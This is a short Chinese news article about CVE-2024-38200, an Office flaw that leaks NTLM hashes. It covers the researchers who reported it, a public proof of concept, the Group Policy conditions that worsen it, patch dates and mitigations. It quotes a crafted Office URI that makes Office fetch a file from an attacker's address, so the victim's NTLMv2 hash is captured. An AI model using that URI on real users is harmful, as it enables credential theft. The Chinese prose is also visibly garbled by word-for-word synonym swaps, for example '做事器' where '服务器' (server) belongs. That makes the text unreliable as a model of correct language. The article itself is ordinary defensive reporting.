该漏洞最初由 PrivSec Consulting 的 Jim Rush 和 Synack 红队的 Metin Yunus Kandemir 报告,许可攻击者从受害者的系统发起到攻击者掌握的远程做事器的出站 NTLM 连接。
当发生此连接时,Windows 会自动将用户的NTLM 哈希(包括哈希密码)发送到攻击者的做事器。
在 GitHub 上发布的 PoC 漏洞演示了如何利用 Office URI Schemes 利用该漏洞。
通过制作分外格式的 URI(例如 ms-excel:ofe|u|http://192.168.1.7/leak.xlsx),攻击者可以诱骗 Office 运用程序访问远程文件而不触发任何警告。这许可通过 SMB 和 HTTP 协议捕获 NTLMv2 哈希。
研究职员指出,当与“Internet 属性”中的某些组策略工具 (GPO) 配置结合时,该漏洞尤其危险。
如果运用特定设置,例如将 IP 范围添加到受信赖的站点或启用用户身份验证的自动登录,Office 运用程序将自动实行 NTLM 身份验证,从而使利用变得更加随意马虎。
微软于 2024 年 7 月 30 日通过 Feature Flighting 发布了部分修复,终极补丁于 2024 年 8 月 13 日发布。
安全专家建议采纳几种缓解方法,包括限定到远程做事器的传出 NTLM 流量、将用户添加到受保护用户安全组以及阻挡来自端口 TCP 445 的出站流量。
该漏洞 PoC 的发布凸显组织安装补丁并履行缓解方法的紧迫性。
安全专家提醒人们把稳与 NTLM 身份验证干系的持续风险,微软已正式弃用该身份验证,转而采取 Kerberos 等更安全的替代方案。
随着威胁形势的不断演化,系统管理员和安全专业职员必须随时理解新涌现的漏洞,并及时采纳行动,保护他们的网络和用户免受利用 CVE-2024-38200 等漏洞的潜在攻击。
链接:
https://cybersecuritynews.com/poc-exploit-office-0-day-flaw/
